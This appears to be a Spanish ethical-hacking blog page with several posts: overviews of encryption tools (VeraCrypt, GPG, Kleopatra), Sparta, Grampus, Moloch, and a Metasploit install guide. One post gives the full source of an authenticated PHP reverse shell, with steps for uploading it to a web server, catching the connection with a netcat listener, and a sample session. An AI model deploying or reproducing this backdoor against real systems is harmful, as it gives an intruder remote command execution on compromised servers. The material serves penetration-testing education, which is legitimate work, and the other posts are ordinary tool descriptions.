actualidad sobre consultoria, normas y seguridad de la informacion
Guias, procesos y manuales sobre Ethical Hacking
Mostrando entradas con la etiqueta herramientas. Mostrar todas las entradas

La mejor Combinacion de Cifrado GNU

Algunas empresas gastan mucho dinero en soluciones de cifrado, DLP y seguridad siendo estas soluciones algo costosas y poco facil de manejar. como lo es el reconocido Criptzone una solución muy completa en cifrado.

Para los  amantes del GNU existe una combinación que puede suplir este tipo de soluciones, otorgándonos esa misma seguridad que otras soluciones pagas, con un plus una comunidad en constante crecimiento y actualización.

VeraCrypt - GNU Privacy Guard - Kleopatra


Esta combinacion abarca la seguridad de nuestra información en cualquier dispositivo de almacenamiento. Y la integridad de nuestra información la cual vamos a tratar de implementar un nivel de seguridad para evitar posibles modificaciones en nuestras comunicaciones.

Nuestra primera herramienta es VeraCrypt: Esta herramienta es la mejor alternativa GNU en cifrado tras el abandono del proyecto TrueCrypt. es mas la difunta herramienta es base de VeraCrypt aunque tiene mejoras de seguridad tras la auditoría que realizó @Mounir Idrassi al código de TrueCrypt.

En un contenedor estándar, TrueCrypt usaba 2.000 iteraciones para la transformación de la contraseña. VeraCrypt usa 655.331 iteraciones del mismo algoritmo (PBKDF2-RIPEMD160) y 500.000 de SHA-2 y Whirlpool.


Esto significa que, como consecuencia, VeraCrypt es ligeramente más lento en abrir particiones cifradas, pero en contraprestación, hace que éstas sean de 10 a 300 veces más difíciles de violentar por fuerza bruta. Además de esto, alega que se han corregido debilidades en la API y en los drivers, y que el código ha pasado por herramientas de análisis para corregir otros defectos.



Ps para los que usaban TrueCrypt y se preguntan si podran migrar sus archivos lamento decirles que no, aun que VeraCrypt luce muy similar en apariencia e interfaz a TrueCrypt, su formato de almacenamiento es incompatible con éste, lo que significa que no podrás migrar tus archivos directamente.

Documentación de la herramienta: aqui

GNU Privacy Guard

Esta es una herramienta de cifrado y firmas digitales, que viene a ser un reemplazo del PGP (Pretty Good Privacy) pero con la principal diferencia que es software libre licenciado bajo la GPL. GPG utiliza el estándar del IETF(Internet Engineering Task Force) denominado OpenPGP.
del cual ya hemos hablado en otra ocasión pero específicamente de GPG4win en Enigmail+ThunderBird.
Un proyecto de código abierto que puede ayudarle a cifrar sus correos electrónicos y archivos directament, el GNU Privacy Guard para Windows.

https://www.gnupg.org/
KLEOPATRA

Es la herramienta de KDE para manejar certificados X 509 y OpenPGP y almacenes de certificados GPG y para recuperar certificados de servidores LDAP y otros servidores de certificados.
Tambien sirve para cifrar los correos electrónicos enviados desde el gestor Kmail. Pero lo que realmente nos interesa es la utilidad de esta aplicación, que permite cifrar y proteger nuestros documentos con un solo click.


La función principal de Kleopatra es mostrar y editar el contenido de la caja de claves local, que es similar al concepto de los anillos de claves de GPG, aunque no se ajuste demasiado a esta analogía.


Puede econtrar el Tutorial completamente en español de Kleopatra en la web de KDE


Read more

PHP Shell Inversa v1.0 - Autenticación de funciones.



Esta herramienta está diseñada para situaciones en la que un pentester tiene acceso a un servidor web que ejecuta PHPy requiere de una Shell para trabajos de Ethical Hacking.

Este Script se debe subir en algún lugar de la raíz  del sitio web, después ejecutarlo accediendo a la URL correspondiente en su navegador. La Shell se abrirá bajo una conexión TCP desde el servidor web a un host y el puerto definido en el guión.

Esta Shell es adecuada para que se puedan ejecutar programas interactivos como Telnet y SSH.
Esta Shell tiene una función de autenticación incorporada que evita que otra persona abuse de su Backdoor.
Se diferencia de las demas Shell de formulario de autenticacion basado en Web que le permite enviar un solo comando,

Modificación de conexión en el Cod. 


1
2
3
$ip = "127.0.0.1"; #Cambie esto a su IP 
$puerto = 4444;      #Cambie esto a su puerto
$contraseña = base64_decode("aGFja3N5c3RlYW0="); #Contraseña por defecto: hacksysteam (MD5)

Cambie los valores según su necesidad y situación

Configuración de NetCat Receptor:

Inicie un receptor Netcat en un host y el puerto que será accesible por el servidor web.
Utilice el mismo puerto en este momento según lo especificado en el script de shell inversa, por ejemplo, (4444):


1
C:\Users\Antony\netcat>:~ # nc -lvvp 4444

Subir el Script y Ejecutarlo:
Subir el Script de Shell Inversa. Ejecute el script simplemente buscando el archivo recién cargado en su navegador web.


1
http:/<IP>/<RUTA/<Script>.php


Nota: No verá ninguna salida en la página web, si esta tiene activada (display errors) puede que muestre algun warning o error y la pagina queda en un lapso de espera, de ser asi haga caso omiso y revise su NetCat Listener.

En el encontrara la captura del login del script, digite la contraseña configurada para ingresar a la Shell:


 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
C:\Users\Antony\netcat>nc -lvvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from localhost127.0.0.1 [127.0.0.1] 4077

 _    _            _     _____
| |  | |          | |   / ____|
| |__| | __ _  ___| | _| (___  _   _ ___
|  __  |/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/
 _______                        __/ |
|__   __|                      |___/
   | | ___  __ _ _ __ ___
   | |/ _ \/ _` | '_ ` _ \
   | |  __/ (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|

    Reverse Shell in PHP
    Author: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com/

Enter Password: hacksysteam

Authentication Successfull..

System Information:

Current Working Directory:
User Group:
Current Date and Time: La fecha actual es: 09/03/2015
Escriba la nueva fecha: (dd-mm-aa)

@127.0.0.1:~#


Código Fuente de la Shell Inversa


  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
<?php
###################################################
#               Reverse Shell v1.0                #
#             Authentication Feature              #
#                                                 #
#            Hacksys Team - Panthera              #
#             Author: Ashfaq Ansari               #
#            hacksysteam@hotmail.com              #
#          http://hacksys.vfreaks.com             #
#              Designed for Linux                 #
#             Thanks to lionaneesh                #
#             lionaneesh@gmail.com                #
###################################################

ini_set('max_execution_time' ,0);

$VERSION = "1.0";
$ip = "127.0.0.1"; #Change this
$port = 4444;      #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)

$banner = ("
 _    _            _     _____            
| |  | |          | |   / ____|                            
| |__| | __ _  ___| | _| (___  _   _ ___
|  __  |/ _` |/ __| |/ /\___ \| | | / __|
| |  | | (_| | (__|   < ____) | |_| \__ \
|_|  |_|\__,_|\___|_|\_\_____/ \__, |___/
 _______                        __/ |                                
|__   __|                      |___/  
   | | ___  __ _ _ __ ___  
   | |/ _ \/ _` | '_ ` _ \
   | |  __/ (_| | | | | | |
   |_|\___|\__,_|_| |_| |_|
   
    Reverse Shell in PHP
    Author: Ashfaq Ansari
   hacksysteam@hotmail.com
 http://hacksys.vfreaks.com/\n\n");

$pwd = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
$date = shell_exec("date");
$len = 1337;
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User Group: $id
Current Date and Time: $date\n
");

print "\nTrying to connect to: $ip on port $port ...\n\n";

$sockfd = fsockopen($ip , $port , $errno, $errstr );

if($errno != 0)
  {
    print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
    die(0);
  }
else if (!$sockfd)
  {
    print "Fatal : An unexpected error was occured when trying to connect!\n";
  }
else
  {
    print "Connected to: $ip on port $port ...\n\n";
    fputs ($sockfd , $banner);
    fputs($sockfd ,"Enter Password: ");
    $getpass = trim(fgets($sockfd, strlen($password) + 2));

    if ($getpass == $password)
    {
      fputs($sockfd, "\nAuthentication Successfull..\n");
      fputs($sockfd, $info);
      while(!feof($sockfd))
      {
    $cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
    fputs ($sockfd , $cmdPrompt );
    $command = trim(fgets($sockfd, $len));
        if (trim($command) == "exit")
    {
      fputs($sockfd ,"\nAborted by user... Exiting..." );
      fclose($sockfd);
      die(0);
    }
    fputs($sockfd , "\n" . shell_exec($command) . "\n");
      }
      fclose($sockfd);
      die(0);
    }
    else
    {
      fputs($sockfd ,"\nInvalid Password... Quitting...");
      fclose($sockfd);
      die(0);
    }
  }
?>



Agradecimiento a @Ashfaq Ansari autor del Script.




Read more

Sparta Pentesting


Una herramienta mas para el repertorio de (Pentesting Tool's)


¿Que es Sparta?
Sparta es una herramienta para pruebas de penetración desarrollada en python. la herramienta fue desarrollada con el objetivo de simplificar las pruebas de pentesting en la fase de exploración y enumeración.


La herramienta al igual que otras herramientas de este tipo funciona como un contenedor de otras herramientas las cual también están destinadas a la seguridad de los sistemas. Básicamente integra NMAP, Hydra, nikto y otras herramientas por debajo para hacernos el trabajo mucho mas simple.

Requerimientos de instalación

Se recomienda Usar la distribución Linux Kali (Distribución Linux Centrada en Pentesting)  como ya tiene la mayoría de las herramientas instaladas, sin embargo puede instalar SPARTA en los sistemas basados ​​en Debian.

Descarga la herramienta desde GitHub


git clone https://github.com/secforce/sparta.git

 apt-get install python-elixir
Ubuntu 12.04+ (untested)
apt-get install python-elixir python-qt4
Aparte de Phyton +Modulos, se requieren las siguientes herramientas para la funcionalidad mínima de SPARTA :
- nmap (para agregar hosts)
- hidra (para la pestaña "Brute")
- cutycapt (para captura de pantalla)

apt-get install nmap hydra cutycapt
En Kali, para asegurarse de que tiene todas las herramientas utilizadas por el uso de configuración por defecto de SPARTA:

apt-get install ldap-utils rwho rsh-client x11-apps finger

Para mayor información de la herramienta visitar el sitio oficial

Una gracias por esta prometodora herramientas a sus autores:
Antonio Quina (@st3r30byt3) Leonidas Stavliotis (@lstavliotis)


Read more

Grampus Herramienta para Pentesters y Forenses


Grampus Project nace para todos aquellos usuarios que necesitan automatizar sus procesos en auditorias web.

Como sabemos la recopilación de información a la hora de realizar un ataque a un objetivo es esencial y a veces este proceso puede ser muy largo y pesado.

En estos momento el proyecto se encuentra en su fase BETA y es una herramienta muy prometedora, funcional e ideal para trabajo de Pentesters y Forense.

El proyecto Grampus se divide de esta manera :
  • Forensic Grampus
  • Anti-Forensic Grampus
  • Grampus
  • Anti Grampus
Todas estas herramienta son programadas en python la cual lo hace multiplataforma

Forensic Grampus : 

Es una herramienta forense que pretende extraer y analizar los meta-datos encontrados en documentos, imágenes , archivos y aplicaciones.
Esta totalmente programado en Python por lo que es la perfecta alternativa multi-plataforma para Forensic FOCA superando a esta con creces en cuanto a extensiones soportadas.

(Para ver las extensiones soportadas puedes visitar el proyecto en Bitbucket)

Anti-Forensic Grampus : 

Anti Forensic Grampus es una herramienta ANTI forense que pretende eliminar o modificar aquellos meta-datos encontrados en documentos, imágenes, archivos y aplicaciones.
Es una buena alternativa a Metashield Protector proporcionando protección contra las mismas extensiones que podemos analizar en Forensic Grampus.

Grampus : 

Grampus es una herramienta para la automatización de procesos fingerprinting en los trabajos de auditoria web sumándole a esto la posibilidad de extraer y analizar los documentos públicos encontrados en la propia página a la que se le realiza la auditoria.

Anti - Grampus : 

Anti Grampus es una herramienta creada para evitar exponer datos o credenciales que puedan ser de utilidad en ese proceso de fingerprinting volviendo así a nuestro sitio más seguro.

Los desarrolladores del proyecto:
@OverxFlow
@Kodeinfect el designer oficial

Pueden seguir y descargar el proyecto en bitbucket : https://bitbucket.org/grampusteam/
o noticias del proyecto en la cuenta twitter del proyecto: https://twitter.com/GrampusTeam

Saludos.


Read more

Instalación de metasploit (Linux-Windows)


Hola Gente hoy veremos como instalar Metasploit Framework individualmente de un distro contenedora como son Kali, Backtrack, Etc...

INSTALACIÓN METASPLOIT LINUX (CENTOS 64BITS)

Primero que todo descargamos nuestra versión de Metasploit desde la web oficial para nuestro linux en este caso una distro CntOS 6.3 de 64 bits.

En la web encontraremos lo siguiente selecionamos y descargamos.


[antony@localhost ~]$wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run

Una vez descargado otorgamos permisos de ejecución al archivo.


[antony@localhost ~]$chmod +x metasploit-latest-linux-x64-installer.run

Ejecutamos para iniciar la instalación.


[antony@localhost ~]$sudo ./metasploit-latest-linux-x64-installer.run

A continuación se inicia el wizard de instalación.




Hacemos clic en Forward y continuamos con la instalación.




Seleccionamos la ruta de instalación yo optare por la recomendada o default.

Ahora podemos seleccionar si queremos registrar Metasploit como un servicio. De esta manera automáticamente se inicia cada vez que se enciende la máquina.

Nos pide deshabilitar antivirus y firewall para evitar conflictos.


En la siguiente ventana nos pedira seleccionar el puerto SSL de conexion por default es el 3790.

en la siguiente ventana nos pedira generar el certificado SSL y su caducidad. selecionamos que si y en mi caso dejo todo x defecto.
A continuación Metasploit Comenzara a instalarse.


Una vez finalizada la instalación nos pedira acceder a la interfaz web de Metasploit.

En esta nos encontramos con un formulario web en la cual podremos solicitar una licencia de uso a la comunidad. recordemos que metasploit tiene una version pro paga. esta es completamente gratuita soportada por la comunidad de Metasploit.
LLenamos el formulario enviamos y recibimos nuestra licencia





INSTALACIÓN DE METASPLOIT EN WINDOWS 64BITS

Aca tratare de no enfatizar mucho ya que la instalación es similar a la de linux  nos toparemos con las mismas ventanas que lo explicado anteriormente algo común para los amantes windows ;)

En el sitio de descarga mencionado anteriormente descargamos la version para sistemas windows con arquitectura de 64bits

Al igual que en los sistemas linux debemos tener desactivado cualquier AV o Firewall que se encuentre activo. y seguimos los pasos al igual que sistemas basado en unix.




Al igual que en linux entraremos a la interfaz web:
el cual igualmente nos llevara al mismo formulario en la url: localhost:3790/users/new





Read more

MOLOCH, ESCANNER DE RED VIA WEB DE AOL

La empresa AOL ha hecho publica una herramienta de análisis de trafico de red al parecer versátil en modo Open Souce. se trata de Moloch


Se que a muchos les parecerá una herramienta mas. qué nos aporta frente a otras herramientas como Wireshark?

  • Se utiliza y gestiona vía web
  • Está muy enfocado al análisis forense, por lo que hay disponibles plugins muy concretos para dichos menesteres (como por ejemplo, Geolocalización de tramas, reglas de Yara...)
  • Facilidad para la búsqueda e indexado de información dentro de las capturas de red
  • Posibilidad de crear GUIs propias debido a que hay disponible una API para todo el mostrado de información
  • Para el análisis en tiempo real, es posible disponer de una arquitectura distribuida sobre la que mantener sus componentes (bases de datos, indexados, visor de eventos...) y almacenar capturas de tráfico para su posible investigación futura.
Sobre los componentes de esta herramienta, tendremos los siguientes:
  1. capture - el elemento (escrito en C) que nos permitirá capturar tráfico directamente desde la fuente por cada interfaz de red de la que nos interese obtener información.
  2. viewer - aplicación en node.js que se ejecuta por cada máquina en red y que mantiene la interfaz web y la transferencia de ficheros PCAP.
  3. elasticsearch - tecnología de base de datos que nos facilitará la tarea de búsqueda de información.
Ejemplo simple de arquitectura para Moloch

Interfaz de la versión 0.8.0 de Moloch

Gracias a la interfaz, tendremos diferentes visualizaciones que nos facilitarán la tarea en la investigación, como es el caso del modo "Connections", el cual mediante un grafo nos visualizará relaciones entre los elementos involucrados, o el visor "SPI View" con el que podemos filtrar la información en base a multitud de criterios y elementos procesados.

Visualizador de conexiones según búsqueda realizada en base de datos de tráfico en Moloch

Vista SPI con filtrado e indexado de información almacenada en capturas de tráfico

Sin duda una herramienta a tener en cuenta, que nos permitirá llevar el análisis de tráfico a un nuevo nivel, y nos dará más visibilidad en nuestras tareas diarias en las que necesitemos investigar actividad de red de una manera ágil e intuitiva.

Si quieres probar la herramienta de manera online a modo de demo, podrás acceder a la siguiente URL:
utilizando moloch/moloch como credenciales.

Podra descargar el proyecto desde la siguiente url


Read more